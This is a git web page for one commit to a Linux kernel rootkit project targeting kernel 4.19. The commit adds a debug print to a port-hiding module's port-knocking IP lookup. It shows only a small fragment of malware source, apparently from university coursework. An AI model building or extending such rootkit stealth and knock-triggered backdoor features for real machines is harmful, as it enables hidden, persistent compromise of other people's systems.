linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 9dc06ea6f7cfa204baa3bc6aa9c4b1fb0994642e
parent 8208eec7517a0e5e620242b19734510b2aab7bf4
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 10 Jan 2021 21:00:53 +0100

adds debug info

Diffstat:

Msrc/porthide.c | 6+++++-


1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/src/porthide.c b/src/porthide.c
@@ -173,8 +173,12 @@ find_knock_in_list(knock_list_t_ptr head, ip_t ip, ip_version version)
 {
     knock_list_t_ptr i;
     for (i = head; i; i = i->next)
-        if (!memcmp(i->ip, ip, (version == v4 ? 4 : 16)) && (version == -1 || i->version == version))
+        if (!memcmp(i->ip, ip, (version == v4 ? 4 : 16)) && (version == -1 || i->version == version)) {
+            int knock;
+            memcpy(&knock, ip, 4);
+            DEBUG_INFO("found ip %0X in list\n", knock);
             return i;
+        }
 
     return NULL;
 }